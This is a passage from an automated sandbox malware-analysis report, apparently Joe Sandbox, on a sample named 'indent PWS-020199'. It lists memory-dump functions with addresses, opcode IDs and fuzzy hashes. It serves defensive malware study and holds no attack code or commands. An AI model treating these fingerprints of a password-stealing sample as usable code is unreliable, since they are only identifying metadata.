                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d52a9a1479bd6f022a92ef47715e563d807bbad37ec4cd08a8d0a5a51df16272
                            • Instruction ID: 237f1f46d3711a6faacb41d2de06e261c6a548fe0646bfa035fc6d5f8305c56a
                            • Opcode Fuzzy Hash: d52a9a1479bd6f022a92ef47715e563d807bbad37ec4cd08a8d0a5a51df16272
                            • Instruction Fuzzy Hash: E721EBB1E40349ABCB14DFAAD8809AEFBF8FF98710F11012FE505AB250D7709945CB60
                            Function 015480A8 Relevance: .1, Instructions: 69COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                            • Instruction ID: e960c9db7ba7d4a1c32ac46a4a4f45df1a4ac95e911756b80f6408184489ce04
                            • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                            • Instruction Fuzzy Hash: ED218C76A0020AEFDF129F98CC40BAEBBB9FF98714F20481AF905AB251D734D9509B50
                            Function 014E0124 Relevance: .1, Instructions: 68COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                            • Instruction ID: 812bfa399e8f6e3bb9255193348e04552372803d9cd3a6cef093021100d82a65
                            • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                            • Instruction Fuzzy Hash: 6611E272600605AFD7269F45CC84F9ABBB8EB90755F10006EF6108F2A0D6B2ED44CB50
                            Function 014B8770 Relevance: .1, Instructions: 68COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1e46796c4fb98cfc06cbb755f739c5ddf596eddac5da39f191e56a702aca4654
                            • Instruction ID: d22bbb0d255110ac6197a3da449b4709f878a8dcadba14899c54d0c241bacae9
                            • Opcode Fuzzy Hash: 1e46796c4fb98cfc06cbb755f739c5ddf596eddac5da39f191e56a702aca4654
                            • Instruction Fuzzy Hash: 2E11B2357016129BDB11CF5DC8C0A9BBBEDAF5A715B1840BEEE08DF315D6B2D90287A0
                            Function 014EAAEE Relevance: .1, Instructions: 68COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                            • Instruction ID: dfd4dd226b3b1aa4ca5b7c4a68c8026375c52337191e2a866822b90352485388
                            • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                            • Instruction Fuzzy Hash: A1218E72A00641DFDB318F4AC548A66FBE6FB94B51F24893EEA458B720C730EC01CB40
                            Function 014B80E9 Relevance: .1, Instructions: 66COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 494c91e032f693be1b9d4f42f6a8a95da1fb668c24b9a7a9c32610994658150d
                            • Instruction ID: 7bf0d8260f766cd43439918c1eae2b1dee3fd07f4f27a79b28b748804a11a212
                            • Opcode Fuzzy Hash: 494c91e032f693be1b9d4f42f6a8a95da1fb668c24b9a7a9c32610994658150d
                            • Instruction Fuzzy Hash: 14216F75A41206DFCB14CF58C581AAEBBB9FB88714F24416ED105AB365C771AD06CBE0
                            Function 014E674D Relevance: .1, Instructions: 65COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: faaf490eeed8dd7c4abd23b7aea210e0ca80303deae27bc7850ac6ac4eb494c0
                            • Instruction ID: 99e6588ea48bde0def0ce754d6258fb6f2be854c751f0364e8fda9aa749deb32
                            • Opcode Fuzzy Hash: faaf490eeed8dd7c4abd23b7aea210e0ca80303deae27bc7850ac6ac4eb494c0
                            • Instruction Fuzzy Hash: 8D219D75640A01EFD7208F69C880F66B7F8FF64651F45882EE5AACB260DB70B840CB60
                            Function 01546870 Relevance: .1, Instructions: 63COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 76a2fc22915cbd8741d7726fdb14c83dc9e6a17f95d37456466243296472579f
                            • Instruction ID: 8c3c391d11dfaf6eac21363f331c8f561d975d6bd02e929e5e419ea324c4b496
                            • Opcode Fuzzy Hash: 76a2fc22915cbd8741d7726fdb14c83dc9e6a17f95d37456466243296472579f
                            • Instruction Fuzzy Hash: F3119136240615EFD722DB5AC940F9A77E8FB96B68F114029F205DF261DBB0E901C7A0
                            Function 014DE8C0 Relevance: .1, Instructions: 63COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9be30806b0fe011657c0f5183fdb7c7757aa38e58693ea880065833ab2402f09
                            • Instruction ID: feac345b8fd9b35d0737d1592276eacb15739628bf543a2d9f3b61b685688c98
                            • Opcode Fuzzy Hash: 9be30806b0fe011657c0f5183fdb7c7757aa38e58693ea880065833ab2402f09
                            • Instruction Fuzzy Hash: 67114C373041109BCF1ACB29CC54A6F7796EBD1374B28493ED522DF3A0D9308802C790
                            Function 014E66B0 Relevance: .1, Instructions: 61COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a2b9d687694235760d17c422f7054ec4a430de7c993a1164e701c069fe0fb9fc
                            • Instruction ID: 7c688ee96434603c9e6e25424416d4726fb2b1841cdc965f08f34f87425905a9
                            • Opcode Fuzzy Hash: a2b9d687694235760d17c422f7054ec4a430de7c993a1164e701c069fe0fb9fc
                            • Instruction Fuzzy Hash: 4F11CE76A81205DFCB25CF99C584E5BBBF8AFA4611F06807FD9059B320EA70DD00CB90
                            Function 0157A8E4 Relevance: .1, Instructions: 61COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                            • Instruction ID: 870cf6af4d2813d2f372779847b5e813975c6db46bd475ebee74644816f2654a
                            • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                            • Instruction Fuzzy Hash: E511C436A0091AAFDB19CF58CC05B9DBBF5FFC4210F098269E8559B350E671AD51CB90
                            Function 014B0AD0 Relevance: .1, Instructions: 61COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                            • Instruction ID: b1a14267abcca1a09ada502dafae7395fe76ef8676690200d5ea20be69ae8e02
                            • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                            • Instruction Fuzzy Hash: 7A21E3B5A00B059FD3A0CF29C480B56BBF4FB48B20F10492EE98AC7B50E371E814CB94
                            Function 0153E7E1 Relevance: .1, Instructions: 59COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                            • Instruction ID: 919af053fdc2bae4c7c4b353ee74aba2fdb86644b7eed32ef93f5cf327b00717
                            • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                            • Instruction Fuzzy Hash: FC119E32A00605EFE7219F49C842B5AFBE5FBD6754F05842DEA099F1A0DB31EC41DB90
                            Function 014D27ED Relevance: .1, Instructions: 58COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1b0c6833c4ace5a10b17b5821d87789dcb7b24ee4862615b0bb90056332f4b57
                            • Instruction ID: e9350882d7c1b3c59cedbc5918346e83c2af29756e2cb442c2d9a226dd0dcbe3
                            • Opcode Fuzzy Hash: 1b0c6833c4ace5a10b17b5821d87789dcb7b24ee4862615b0bb90056332f4b57
                            • Instruction Fuzzy Hash: F4010431206685AFF717A66ED895F6B6B9CFF90654F45006AF9008F2A1D974DC01C2B1
                            Function 014B4690 Relevance: .1, Instructions: 57COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b89300e8b5640f2e2d759dffe6e0702c2045a844e8dcf690dd8f86fe557700b6
                            • Instruction ID: 56599dd5df0bf37c4f74b4f15bbe78df14ee89c64f832fe692e27e5cfe0127a2
                            • Opcode Fuzzy Hash: b89300e8b5640f2e2d759dffe6e0702c2045a844e8dcf690dd8f86fe557700b6
                            • Instruction Fuzzy Hash: 1C110236200645AFDB21CFA9C884F977BA4EB96B64F18411BF9068B762C330E811CF70
                            Function 01584B00 Relevance: .1, Instructions: 57COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 456947078d2a4afeb6804c203b3daabcfb7e7e72f6d6b8ff1db6351675696db9
                            • Instruction ID: ecf43c74c1d6b4bf2d08a2afe59d2d964ec5cd2408e8bbbf1f1c679878024063
                            • Opcode Fuzzy Hash: 456947078d2a4afeb6804c203b3daabcfb7e7e72f6d6b8ff1db6351675696db9
                            • Instruction Fuzzy Hash: C811E9362006129FDB21EA69D840F6BB7E5FFC4712F15442AEE92DB690DA30E802C790
                            Function 014E6620 Relevance: .1, Instructions: 56COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a3025aceae59d620bfebc4d4b716be450c2c1818068e9d0d0fa66e2903088470
                            • Instruction ID: 9e19d16a9a2c206261fb2379cda1bae3886b0a5cd2f95b8dd6e10127155bbcb8
                            • Opcode Fuzzy Hash: a3025aceae59d620bfebc4d4b716be450c2c1818068e9d0d0fa66e2903088470
                            • Instruction Fuzzy Hash: B311C676910615ABDB21DF69C9C4B5EFBF8FF64741F51045ADA08A7320D730AD018F60
                            Function 014DEA2E Relevance: .1, Instructions: 56COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8b4175cf6d7b1bf532b7b816d12845f14402eb2fe4e7c6881bd6125137cee12e
                            • Instruction ID: 8d2c98d9659c271d33acbb1ac0f45b700d6f5c04715cd8089f7cc0a126c8fe21
                            • Opcode Fuzzy Hash: 8b4175cf6d7b1bf532b7b816d12845f14402eb2fe4e7c6881bd6125137cee12e
                            • Instruction Fuzzy Hash: D30100701101069FCB25CB19D494E16BBE9FB91314F61816FE1059F331D770EC46CB90
                            Function 014DE53E Relevance: .1, Instructions: 55COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                            • Instruction ID: 2626b426c74c53f953475fcbbfc114854ebe696466d45e86c436607a8aff52d8
                            • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                            • Instruction Fuzzy Hash: 6211C2722016C29BFB239B6C8964B693B94BB00B88F1904A7DA419F662F339C847C250
                            Function 0153E75D Relevance: .1, Instructions: 54COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                            • Instruction ID: c992a37531869ac4e43bdbf7f562aa62aeba0fae5a328a1284557145cb5d026d
                            • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                            • Instruction Fuzzy Hash: 5B019236600146AFE7229F59C842F5B7BE9FBD5B50F058429EA05AF260E771DD40CB90
                            Function 014AA250 Relevance: .1, Instructions: 52COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                            • Instruction ID: e23ee1a9611d0fceb18e0539f2c24cb9c386511688be966afecbbfc218c52a83
                            • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                            • Instruction Fuzzy Hash: 4B0126365047229BCB318F19D840A377BA4EF65B60751852FFD958B3A1C331D421CB60
                            Function 01584940 Relevance: .1, Instructions: 52COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2f04a2f25c0831fc91e2fae3bc0f3df4bb2ba79d7ce2272b90e5ed5d674e4c28
                            • Instruction ID: f3bc2ac38cd95c81525461f886ed77ceac7796acca477bc97f7908fe7c41cc11
                            • Opcode Fuzzy Hash: 2f04a2f25c0831fc91e2fae3bc0f3df4bb2ba79d7ce2272b90e5ed5d674e4c28
                            • Instruction Fuzzy Hash: CF01D2725416129FC332EF1DD840F5AB7A8FB91770B264269EDA9AF1A6D730D801CBD0
                            Function 0152E1D0 Relevance: .1, Instructions: 51COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e425bcc5e73dfec9b6217363a40767316f2a6e40b230579513f73f4281946938
                            • Instruction ID: ffc1fe962d468ba3ca9c2158344ea70fe10d40827566d18bc69f399eb173a11d
                            • Opcode Fuzzy Hash: e425bcc5e73dfec9b6217363a40767316f2a6e40b230579513f73f4281946938
                            • Instruction Fuzzy Hash: CD110432241240EFCB15EF0ACC91F4A7BB8FF65B44F10006AF9059F2A1C231ED01CAA0
                            Function 014B6259 Relevance: .1, Instructions: 51COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6fdf6e32404514dd1bcb1ffe84a43aebb78848075c53b990fbf96312e3c161ac
                            • Instruction ID: 61a1e175bef959cf983d783d4aa62f65f26c2bf83fd7b6fc300dbf3d27b241dc
                            • Opcode Fuzzy Hash: 6fdf6e32404514dd1bcb1ffe84a43aebb78848075c53b990fbf96312e3c161ac
                            • Instruction Fuzzy Hash: 11119E7054121CABEB25AF25CC41FE97274BB14710F5041DAA714AA1F0D6709E81CF94
                            Function 01536050 Relevance: .0, Instructions: 50COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 68f773ca8382bcb45bc72b8426df6ff399d00b961d98d698ab01f185d5cc3701
                            • Instruction ID: a7cbc382d4aef3bf92a072dfa35a08495a12b97e37136c8b47b97b154c28e974
                            • Opcode Fuzzy Hash: 68f773ca8382bcb45bc72b8426df6ff399d00b961d98d698ab01f185d5cc3701
                            • Instruction Fuzzy Hash: B0111772900019BBCB11DB95CC84DDFBBBCEF58254F05416AE916AB211EA34EA15CBE0
                            Function 014B208A Relevance: .0, Instructions: 50COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                            • Instruction ID: 051dad6cae527dd77b7068c67086cc36a97c5099fd2184411389577db307fc2a
                            • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                            • Instruction Fuzzy Hash: A601F5726001019BEF229E59D8C0F967766BFD4600F1540ABEE018F2A6DAB1AC82C7A0
                            Function 01546500 Relevance: .0, Instructions: 50COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 346fe599c2d6088be272bb38646307cfb78b2511e530efb6d10d6692bbcc0bb7
                            • Instruction ID: 9fa0c7bd7b9b447ab958a79e2134ffd37285afa087b0d9c5c27acb994346ecc2
                            • Opcode Fuzzy Hash: 346fe599c2d6088be272bb38646307cfb78b2511e530efb6d10d6692bbcc0bb7
                            • Instruction Fuzzy Hash: B611E1326401469FC301CF28C840BE6BBB9FB5A318F488159E8488F315D732EC80CBE0
                            Function 0153C810 Relevance: .0, Instructions: 50COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b9e8832685e2b6dfdbe72346f5fb8f88b69859aef8cf7c6f15abb9ca034f6e12
                            • Instruction ID: 1f4db67a18b74be452055826ea12726c012c6b4cf6526ef0131c78e8dc281054
                            • Opcode Fuzzy Hash: b9e8832685e2b6dfdbe72346f5fb8f88b69859aef8cf7c6f15abb9ca034f6e12
                            • Instruction Fuzzy Hash: EE11ECB1A002499FCB04DF99D541AAEB7F4FF58350F14406BA905E7351D674EE01CBA4
                            Function 0155EA60 Relevance: .0, Instructions: 50COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 35e4602103cf1a002ff650e99ad0c1707b68e06e8b045cff15ab098cf273d301
                            • Instruction ID: f274abb2148c852f7b3f7194d646e5dd51b5005a613a9657f77079e6785e7c68
                            • Opcode Fuzzy Hash: 35e4602103cf1a002ff650e99ad0c1707b68e06e8b045cff15ab098cf273d301
                            • Instruction Fuzzy Hash: 3E01F5354401119FC7B2AA36C415D3FFBA9FF61A50B48482FE9055F211CBB09D41CB91
                            Function 014AC020 Relevance: .0, Instructions: 49COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                            • Instruction ID: 8939f85876876f9519e8e55a0a2ea6f3954ec90b582d077388d7c8d87d4f38c6
                            • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                            • Instruction Fuzzy Hash: CC012D321007059FEB33DAEAC440FA777F9FFD5610F45841EA9458B550DA71E402C750
                            Function 014F20F0 Relevance: .0, Instructions: 49COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 894e5ab2b914855ceff295d7e5dc006157776785f9d5f9d7894c619f294895eb
                            • Instruction ID: 1454bfc95359d78d0383576f6134ff5858b40967041b8beb4b0f1de74b0e3ad2
                            • Opcode Fuzzy Hash: 894e5ab2b914855ceff295d7e5dc006157776785f9d5f9d7894c619f294895eb
                            • Instruction Fuzzy Hash: 83115735A00209ABDB15EFA4C950EAF7BA5FB95650F10405EEA019B3A0DB35EE12CB90
                            Function 014EE5CF Relevance: .0, Instructions: 49COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d632363efd60cfe1af6bdb348d89d98e4d2228abd9e4aaad33f76beb38283511
                            • Instruction ID: acb128826d9d9ae836aedf13fd24389a5415da5cb57eca70eb5f175827328063
                            • Opcode Fuzzy Hash: d632363efd60cfe1af6bdb348d89d98e4d2228abd9e4aaad33f76beb38283511
                            • Instruction Fuzzy Hash: 9001D476200512BBC351AB6ACD40E5BB7ECFB65A54B00053EB10597670DBB4EC01C6E4
                            Function 015469C0 Relevance: .0, Instructions: 49COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a74cd8e0ecb8082a55fa24a28992bbc5de5de594fe7ac55692db61e546fe9ee8
                            • Instruction ID: a6c5eb212537ce1442472acbbc2d1d52f99b1ecce3c92f8d7aa12b529a2958b1
                            • Opcode Fuzzy Hash: a74cd8e0ecb8082a55fa24a28992bbc5de5de594fe7ac55692db61e546fe9ee8
                            • Instruction Fuzzy Hash: 3A014C32214702DBC324DF6BD848AABBBE8FF55624F51452EE9588B290E7309941C7D1
                            Function 0153C460 Relevance: .0, Instructions: 48COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b93bbe43e0cf077b0cddd840a765b298ff7575afa2bf380d79d09a407f0db4f2
                            • Instruction ID: adc2d28e149da3fee3703a106585cabb9104af853223d7c75ec3858ce9f93ebf
                            • Opcode Fuzzy Hash: b93bbe43e0cf077b0cddd840a765b298ff7575afa2bf380d79d09a407f0db4f2
                            • Instruction Fuzzy Hash: C8116975A0020DEBDB15EFA9C844EAE7BB5FB98340F00405AFD01AB390DA35EE11CB90
                            Function 0153C97C Relevance: .0, Instructions: 48COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
